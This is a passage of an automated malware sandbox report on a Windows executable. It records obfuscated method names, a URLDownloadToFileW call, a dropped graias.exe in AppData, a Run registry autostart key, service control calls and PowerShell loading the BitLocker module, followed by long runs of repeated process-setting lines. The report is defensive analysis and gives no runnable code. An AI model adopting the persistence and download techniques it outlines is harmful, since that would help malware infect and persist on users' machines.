                Source: 0.2.iGhDjzEiDU.exe.4309f98.5.raw.unpack, lrQBfVV0rfHwgJoiLc.csHigh entropy of concatenated method names: 'QxRD9x24HcpebWts3CO', 'zUuf1R2QGuCeiVxJAeX', 'oI2vLD2N9ki0sTnF8PY', 'MgGCgSkenW', 'XO1CbdnCJC', 'Fq7Ci4HLLp', 'G1Ziwk2oXKuyB5fhbHT', 'Vh3KG12FCYQHR4jRI22'
                Source: 0.2.iGhDjzEiDU.exe.4309f98.5.raw.unpack, gT1bvP5O25dwYsGRwM.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'nw9HDdlXL2', 'wsLHoweiE9', 'p0ZHzaHnLQ', 'qUIf0i2bSK', 'vLff1k8hbP', 'q3bfHlOdCo', 'llhff7qIuu', 'CjGF87HPXZBAxrLWIub'
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 5_2_00406128 ShellExecuteW,URLDownloadToFileW,5_2_00406128
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeFile created: C:\Users\user\AppData\Roaming\Graias\graias.exeJump to dropped file

                Boot Survival

                barindex
                Creates autostart registry keys with suspicious names
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Rmc-O844B9Jump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 5_2_00419BD4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,5_2_00419BD4
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Rmc-O844B9Jump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Rmc-O844B9Jump to behavior

                Hooking and other Techniques for Hiding and Protection

                barindex
                Loading BitLocker PowerShell Module
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 5_2_0041BCF3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,5_2_0041BCF3
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
